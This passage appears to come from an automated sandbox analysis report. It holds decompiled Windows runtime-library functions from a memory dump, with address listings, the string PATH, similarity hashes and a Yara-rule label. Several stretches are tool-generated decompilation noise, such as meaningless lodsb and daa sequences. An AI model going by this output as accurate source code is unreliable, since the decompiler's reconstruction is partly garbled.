								_t289 = _t289 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0xb88480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xb88480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E00AAEEF0(0xb879a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E00AAEB70(__ecx, 0xb879a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t222 = _v72;
											__eflags = _t222;
											if(_t222 != 0) {
												L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
											}
											_t223 = _v52;
											__eflags = _t223;
											if(_t223 != 0) {
												__eflags = _t339;
												if(_t339 < 0) {
													L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t223);
													_t223 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t299 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0xb87b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L00AB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E00AAEB70(__ecx, 0xb879a0);
										__eax = _v52;
										L36:
										_pop(_t332);
										_pop(_t340);
										__eflags = _v8 ^ _t343;
										_pop(_t290);
										return L00ADB640(_t223, _t290, _v8 ^ _t343, _t320, _t332, _t340);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t285 = _v56;
								if(_v56 != 0) {
									_t320 =  &_v36;
									_t287 = E00AC2E3E(_t285,  &_v36);
									_t299 = _v36;
									_v76 = _t287;
								}
								if(_t299 == 0) {
									goto L44;
								} else {
									_t289 = _t289 + 2 + _t299;
								}
								goto L14;
							case 6:
								__eax =  *0xb85764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0xb88478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xb88478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0xb86e58 & 0x0000ffff;
								__eax = ( *0xb86e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t331 = _t331 + 1;
								if(_t331 >= _v48) {
									goto L16;
								} else {
									_t320 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t304 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("lodsb");
					 *((intOrPtr*)(_t338 + 0x28)) =  *((intOrPtr*)(_t338 + 0x28)) + _t248;
					asm("lodsb");
					_t249 = _t248 + _t248;
					asm("daa");
					asm("lodsb");
					 *_t338 =  *_t338 + _t304;
					asm("es lodsb");
					 *((intOrPtr*)(_t338 + 0x28)) =  *((intOrPtr*)(_t338 + 0x28)) + _t249;
					asm("lodsb");
					 *0x1f00ac26 =  *0x1f00ac26 + _t249;
					_pop(_t294);
					_t251 = _t347;
					_t349 = 0;
					 *((intOrPtr*)(_t251 + _t251 + 0xb05b35)) =  *((intOrPtr*)(_t251 + _t251 + 0xb05b35)) - _t304;
					asm("lodsb");
					 *((intOrPtr*)(_t251 - 0x9ff53d8)) =  *((intOrPtr*)(_t251 - 0x9ff53d8));
					asm("daa");
					asm("lodsb");
					 *_t338 =  *_t338 + _t294;
					 *((intOrPtr*)(_t251 + _t251 + 0xac284e)) =  *((intOrPtr*)(_t251 + _t251 + 0xac284e)) - _t304 +  *_t304;
					asm("daa");
					asm("lodsb");
					_pop(_t295);
					asm("lodsb");
					 *((intOrPtr*)(0 + _t295 * 2)) =  *((intOrPtr*)(0 + _t295 * 2)) + _t320;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0xb6ff00);
					E00AED08C(_t295, _t333, _t338);
					_v44 =  *[fs:0x18];
					_t334 = 0;
					 *_a24 = 0;
					_t296 = _a12;
					__eflags = _t296;
					if(_t296 == 0) {
						_t258 = 0xc0000100;
					} else {
						_v8 = 0;
						_t341 = 0xc0000100;
						_v52 = 0xc0000100;
						_t260 = 4;
						while(1) {
							_v40 = _t260;
							__eflags = _t260;
							if(_t260 == 0) {
								break;
							}
							_t310 = _t260 * 0xc;
							_v48 = _t310;
							__eflags = _t296 -  *((intOrPtr*)(_t310 + 0xa71664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t275 = E00ADE5C0(_a8,  *((intOrPtr*)(_t310 + 0xa71668)), _t296);
									_t349 = _t349 + 0xc;
									__eflags = _t275;
									if(__eflags == 0) {
										_t341 = E00B151BE(_t296,  *((intOrPtr*)(_v48 + 0xa7166c)), _a16, _t334, _t341, __eflags, _a20, _a24);
										_v52 = _t341;
										break;
									} else {
										_t260 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t260 = _t260 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t341;
						__eflags = _t341;
						if(_t341 < 0) {
							__eflags = _t341 - 0xc0000100;
							if(_t341 == 0xc0000100) {
								_t306 = _a4;
								__eflags = _t306;
								if(_t306 != 0) {
									_v36 = _t306;
									__eflags =  *_t306 - _t334;
									if( *_t306 == _t334) {
										_t341 = 0xc0000100;
										goto L76;
									} else {
										_t322 =  *((intOrPtr*)(_v44 + 0x30));
										_t262 =  *((intOrPtr*)(_t322 + 0x10));
										__eflags =  *((intOrPtr*)(_t262 + 0x48)) - _t306;
										if( *((intOrPtr*)(_t262 + 0x48)) == _t306) {
											__eflags =  *(_t322 + 0x1c);
											if( *(_t322 + 0x1c) == 0) {
												L106:
												_t341 = E00AC2AE4( &_v36, _a8, _t296, _a16, _a20, _a24);
												_v32 = _t341;
												__eflags = _t341 - 0xc0000100;
												if(_t341 != 0xc0000100) {
													goto L69;
												} else {
													_t334 = 1;
													_t306 = _v36;
													goto L75;
												}
											} else {
												_t265 = L00AA6600( *(_t322 + 0x1c));
												__eflags = _t265;
												if(_t265 != 0) {
													goto L106;
												} else {
													_t306 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t341 = E00AC2C50(_t306, _a8, _t296, _a16, _a20, _a24, _t334);
											L76:
											_v32 = _t341;
											goto L69;
										}
									}
									goto L108;
								} else {
									E00AAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t341 = _a24;
									_t272 = E00AC2AE4( &_v36, _a8, _t296, _a16, _a20, _t341);
									_v32 = _t272;
									__eflags = _t272 - 0xc0000100;
									if(_t272 == 0xc0000100) {
										_v32 = E00AC2C50(_v36, _a8, _t296, _a16, _a20, _t341, 1);
									}
									_v8 = _t334;
									E00AC2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t258 = _t341;
					}
					L70:
					return E00AED0D1(_t258);
				}
				L108:
			}

0x00ac2584
0x00ac2586
0x00ac2590
0x00ac2596
0x00ac2597
0x00ac2598
0x00ac2599
0x00ac259e
0x00ac25a4
0x00ac25a9
0x00ac25ac
0x00ac25ae
0x00ac25b1
0x00ac25b2
0x00ac25b5
0x00ac25b8
0x00ac25bb
0x00ac25bc
0x00ac25bf
0x00ac25c2
0x00ac25c5
0x00ac25c6
0x00ac25cb
0x00ac25ce
0x00ac25d8
0x00ac25dd
0x00ac25de
0x00ac25e1
0x00ac25e3
0x00ac25e9
0x00ac26da
0x00ac26da
0x00ac26dd
0x00ac26e2
0x00b05b56
0x00000000
0x00ac26e8
0x00ac26f9
0x00ac26fb
0x00ac26fe
0x00ac2700
0x00b05b60
0x00000000
0x00ac2706
0x00ac2706
0x00ac270a
0x00ac270a
0x00ac270d
0x00ac2713
0x00ac2716
0x00ac2718
0x00ac271c
0x00ac271e
0x00b05b6c
0x00b05b6f
0x00b05b7f
0x00b05b89
0x00b05b8e
0x00b05b93
0x00b05b96
0x00b05b9c
0x00b05ba0
0x00b05ba3
0x00b05bab
0x00b05bb0
0x00b05bb3
0x00b05bb3
0x00b05ba3
0x00ac2724
0x00ac2726
0x00ac2729
0x00ac272c
0x00ac279d
0x00ac279d
0x00ac27a0
0x00ac27a2
0x00000000
0x00ac272e
0x00ac272e
0x00ac2731
0x00ac2734
0x00ac2734
0x00ac2736
0x00b05bc1
0x00b05bc1
0x00b05bc4
0x00000000
0x00b05bca
0x00b05bca
0x00b05bcd
0x00000000
0x00b05bd3
0x00000000
0x00b05bd3
0x00b05bcd
0x00ac273c
0x00ac273c
0x00ac2742
0x00ac2747
0x00ac274a
0x00ac274d
0x00ac2750
0x00000000
0x00ac2756
0x00ac2756
0x00000000
0x00ac2902
0x00ac2908
0x00ac290b
0x00000000
0x00ac2911
0x00ac291c
0x00ac2921
0x00000000
0x00ac2921
0x00000000
0x00000000
0x00ac2880
0x00ac2887
0x00ac288c
0x00000000
0x00000000
0x00ac2805
0x00ac280a
0x00ac2814
0x00ac2816
0x00000000
0x00000000
0x00ac281e
0x00ac2821
0x00ac2823
0x00000000
0x00ac2829
0x00ac2829
0x00ac2831
0x00ac283c
0x00ac283e
0x00000000
0x00ac283e
0x00000000
0x00000000
0x00ac284e
0x00ac2850
0x00ac2851
0x00ac2854
0x00ac2857
0x00ac285a
0x00ac285c
0x00ac285d
0x00000000
0x00000000
0x00ac275d
0x00ac2761
0x00000000
0x00ac2767
0x00ac276e
0x00ac2773
0x00ac2773
0x00ac2776
0x00ac2778
0x00ac277e
0x00ac277e
0x00ac2781
0x00ac2781
0x00ac2783
0x00ac2784
0x00000000
0x00000000
0x00b05bd8
0x00b05bde
0x00b05be4
0x00b05be6
0x00b05be8
0x00b05be9
0x00b05bee
0x00b05bf8
0x00b05bff
0x00b05c01
0x00b05c04
0x00b05c07
0x00b05c0b
0x00b05c0d
0x00b05c0d
0x00b05c15
0x00b05c18
0x00b05c1b
0x00b05c1b
0x00b05c1e
0x00000000
0x00000000
0x00ac28c3
0x00ac28c8
0x00ac28d2
0x00ac28d4
0x00ac28d8
0x00ac28db
0x00b05c26
0x00b05c28
0x00b05c2d
0x00b05c2d
0x00000000
0x00000000
0x00b05c34
0x00b05c36
0x00b05c49
0x00b05c4e
0x00b05c54
0x00b05c5b
0x00b05c5d
0x00b05c60
0x00ac2788
0x00ac2788
0x00ac278b
0x00ac278e
0x00ac278e
0x00ac278e
0x00ac2791
0x00000000
0x00000000
0x00ac2756
0x00ac2750
0x00000000
0x00ac2794
0x00ac2794
0x00ac2795
0x00ac2798
0x00ac2798
0x00000000
0x00ac2734
0x00ac272c
0x00ac2700
0x00ac25ef
0x00ac25ef
0x00ac25ef
0x00ac25f2
0x00ac25f8
0x00000000
0x00000000
0x00ac25fe
0x00000000
0x00ac28e6
0x00ac28ec
0x00ac28ef
0x00ac28f5
0x00ac28f8
0x00ac28f8
0x00000000
0x00ac28f8
0x00000000
0x00000000
0x00ac2866
0x00ac2866
0x00ac2876
0x00ac2879
0x00000000
0x00000000
0x00ac27e0
0x00ac27e7
0x00ac27e9
0x00ac27eb
0x00b05afd
0x00000000
0x00b05afd
0x00000000
0x00000000
0x00ac2633
0x00ac2638
0x00ac263b
0x00ac263c
0x00ac263e
0x00ac2640
0x00ac2642
0x00ac2647
0x00ac2649
0x00ac264e
0x00ac2650
0x00ac2653
0x00ac2659
0x00ac26a2
0x00ac26a7
0x00ac26ac
0x00ac26b2
0x00b05b11
0x00b05b15
0x00b05b17
0x00000000
0x00ac26b8
0x00ac26b8
0x00ac26ba
0x00ac27a6
0x00ac27a6
0x00ac27a9
0x00ac27ab
0x00ac27b9
0x00ac27b9
0x00ac27be
0x00ac27c1
0x00ac27c3
0x00ac27c5
0x00ac27c7
0x00b05c74
0x00b05c79
0x00b05c79
0x00ac27c7
0x00000000
0x00ac26c0
0x00ac26c0
0x00ac26c3
0x00ac26c6
0x00ac26c6
0x00ac26c9
0x00ac26c9
0x00000000
0x00ac26c9
0x00ac26ba
0x00ac265b
0x00ac265b
0x00ac265e
0x00ac2667
0x00ac266d
0x00ac2677
0x00ac267c
0x00ac267f
0x00ac2681
0x00b05b49
0x00b05b4e
0x00ac27cd
0x00ac27d0
0x00ac27d1
0x00ac27d2
0x00ac27d4
0x00ac27dd
0x00ac2687
0x00ac2687
0x00ac268a
0x00ac268b
0x00ac268e
0x00ac268f
0x00ac2691
0x00ac2696
0x00ac2698
0x00ac269d
0x00ac269f
0x00000000
0x00ac269f
0x00ac2681
0x00000000
0x00000000
0x00ac2846
0x00000000
0x00000000
0x00ac2605
0x00ac260a
0x00ac260c
0x00ac2611
0x00ac2616
0x00ac2619
0x00ac2619
0x00ac261e
0x00000000
0x00ac2624
0x00ac2627
0x00ac2627
0x00000000
0x00000000
0x00b05b1f
0x00000000
0x00000000
0x00ac2894
0x00ac289b
0x00ac289d
0x00ac28a1
0x00b05b2b
0x00b05b2e
0x00b05b2e
0x00ac28a7
0x00ac28a9
0x00b05b04
0x00b05b09
0x00b05b09
0x00b05b09
0x00000000
0x00000000
0x00b05b35
0x00b05b3c
0x00ac28fb
0x00ac28fb
0x00ac26cc
0x00ac26cc
0x00ac26d0
0x00000000
0x00ac26d2
0x00ac26d2
0x00000000
0x00ac26d2
0x00000000
0x00000000
0x00ac25fe
0x00ac292d
0x00ac292f
0x00ac2930
0x00ac2935
0x00ac2937
0x00ac2938
0x00ac293b
0x00ac293c
0x00ac293e
0x00ac293f
0x00ac2940
0x00ac2942
0x00ac2944
0x00ac2947
0x00ac2948
0x00ac294e
0x00ac2951
0x00ac2951
0x00ac2952
0x00ac295b
0x00ac295c
0x00ac2962
0x00ac2963
0x00ac2964
0x00ac2966
0x00ac296e
0x00ac296f
0x00ac2972
0x00ac2977
0x00ac2978
0x00ac297d
0x00ac297e
0x00ac297f
0x00ac2980
0x00ac2981
0x00ac2982
0x00ac2983
0x00ac2984
0x00ac2985
0x00ac2986
0x00ac2987
0x00ac2988
0x00ac2989
0x00ac298a
0x00ac298b
0x00ac298c
0x00ac298d
0x00ac298e
0x00ac298f
0x00ac2990
0x00ac2992
0x00ac2997
0x00ac29a3
0x00ac29a6
0x00ac29ab
0x00ac29ad
0x00ac29b0
0x00ac29b2
0x00b05c80
0x00ac29b8
0x00ac29b8
0x00ac29bb
0x00ac29c0
0x00ac29c5
0x00ac29c6
0x00ac29c6
0x00ac29c9
0x00ac29cb
0x00000000
0x00000000
0x00ac29cd
0x00ac29d0
0x00ac29d9
0x00ac29db
0x00ac29dd
0x00ac2a7f
0x00ac2a84
0x00ac2a87
0x00ac2a89
0x00b05ca1
0x00b05ca3
0x00000000
0x00ac2a8f
0x00ac2a8f
0x00000000
0x00ac2a8f
0x00000000
0x00ac29e3
0x00ac29e3
0x00ac29e3
0x00000000
0x00ac29e3
0x00ac29dd
0x00000000
0x00ac29db
0x00ac29e6
0x00ac29e9
0x00ac29eb
0x00ac29ed
0x00ac29f3
0x00ac29f5
0x00ac29f8
0x00ac29fa
0x00ac2a97
0x00ac2a9a
0x00ac2a9d
0x00ac2add
0x00000000
0x00ac2a9f
0x00ac2aa2
0x00ac2aa5
0x00ac2aa8
0x00ac2aab
0x00b05cab
0x00b05caf
0x00b05cc5
0x00b05cda
0x00b05cdc
0x00b05cdf
0x00b05ce5
0x00000000
0x00b05ceb
0x00b05ced
0x00b05cee
0x00000000
0x00b05cee
0x00b05cb1
0x00b05cb4
0x00b05cb9
0x00b05cbb
0x00000000
0x00b05cbd
0x00b05cbd
0x00000000
0x00b05cbd
0x00b05cbb
0x00ac2ab1
0x00ac2ab1
0x00ac2ac4
0x00ac2ac6
0x00ac2ac6
0x00000000
0x00ac2ac6
0x00ac2aab
0x00000000
0x00ac2a00
0x00ac2a09
0x00ac2a0e
0x00ac2a21
0x00ac2a24
0x00ac2a35
0x00ac2a3a
0x00ac2a3d
0x00ac2a42
0x00ac2a59
0x00ac2a59
0x00ac2a5c
0x00ac2a5f
0x00ac2a5f
0x00ac29fa
0x00ac29f3
0x00ac2a64
0x00ac2a64
0x00ac2a6b
0x00ac2a6b
0x00ac2a6d
0x00ac2a72
0x00ac2a72
0x00000000

Strings

PATH, xrefs: 00AC2642, 00AC2691

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 04ae43cdf65031d7d8f9b03bd8cfa2524b9e2b0c5dd29fc07f245b428b23a713
Instruction ID: add9ca35174c218638f13cddbcd4c5660c27eba157dc0ae186ecb37a6538ffe7
Opcode Fuzzy Hash: 04ae43cdf65031d7d8f9b03bd8cfa2524b9e2b0c5dd29fc07f245b428b23a713
Instruction Fuzzy Hash: F2C15D75E00219DFCB25DF98D981FAEB7B5FF48700F5A4069E401BB2A1DB74A941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00ACFAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00ACFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E00AAEEF0(0xb87b60);
					_t134 =  *0xb87b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0xb87b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xb87b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E00AA6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E00AA76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00B38938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00A9B150();
													}
													_t116 = E00B36D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E00AA75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0xb88638; // 0x0
																	_t122 = L00AA38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E00AA76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E00AA76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L00ACFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00AA70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E00ACFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E00ACFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E00ACFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E00ACFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E00ACFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0xb87b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0xb87b84 = _t75;
						_t73 = E00AAEB70(_t134, 0xb87b60);
						if( *0xb87b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = L00AAFF60( *0xb87b20);
							}
						}
						goto L5;
					}
				}
			}

0x00acfab0
0x00acfab2
0x00acfab3
0x00acfab4
0x00acfabc
0x00acfac0
0x00acfb14
0x00acfb17
0x00acfac2
0x00acfac8
0x00acfacd
0x00acfad3
0x00acfad3
0x00acfadd
0x00acfb18
0x00acfb1b
0x00acfb1d
0x00acfb1e
0x00acfb1f
0x00acfb20
0x00acfb21
0x00acfb22
0x00acfb23
0x00acfb24
0x00acfb25
0x00acfb26
0x00acfb27
0x00acfb28
0x00acfb29
0x00acfb2a
0x00acfb2b
0x00acfb2c
0x00acfb2d
0x00acfb2e
0x00acfb2f
0x00acfb3a
0x00acfb3b
0x00acfb3e
0x00acfb41
0x00acfb44
0x00acfb47
0x00acfb4a
0x00acfb4d
0x00acfb53
0x00b0bdcb
0x00b0bdcb
0x00acfb59
0x00acfb5b
0x00acfb5b
0x00acfb5e
0x00b0bdd5
0x00b0bdd8
0x00000000
0x00b0bdda
0x00000000
0x00b0bdda
0x00acfb64
0x00acfb64
0x00acfb64
0x00acfb67
0x00acfb6e
0x00acfb70
0x00acfb72
0x00000000
0x00acfb78
0x00acfb7a
0x00acfb7a
0x00acfb7d
0x00acfb80
0x00b0bddf
0x00b0bde1
0x00000000
0x00b0bde3
0x00000000
0x00b0bde3
0x00acfb86
0x00acfb86
0x00acfb86
0x00acfb8b
0x00acfb90
0x00acfb92
0x00acfb94
0x00acfb9a
0x00acfb9b
0x00acfba1
0x00b0bde8
0x00b0bdeb
0x00b0bded
0x00b0beb5
0x00b0beb5
0x00b0bebb
0x00b0bebd
0x00b0bec3
0x00b0bed2
0x00b0bedd
0x00b0bedd
0x00b0beed
0x00000000
0x00b0bdf3
0x00b0bdfe
0x00b0be06
0x00b0be0b
0x00b0be0d
0x00b0be0f
0x00b0be14
0x00b0be19
0x00b0be20
0x00b0be25
0x00b0be27
0x00b0be35
0x00b0be39
0x00b0be46
0x00b0be4f
0x00b0be54
0x00b0be56
0x00b0bef8
0x00b0bef8
0x00000000
0x00b0be5c
0x00b0be5c
0x00b0be60
0x00000000
0x00b0be66
0x00b0be66
0x00b0be7f
0x00b0be84
0x00b0be87
0x00b0be89
0x00b0be8b
0x00b0be99
0x00b0be9d
0x00b0bea0
0x00b0beac
0x00b0beaf
0x00b0beb1
0x00b0beb3
0x00b0beb3
0x00000000
0x00b0bea2
0x00b0bea2
0x00000000
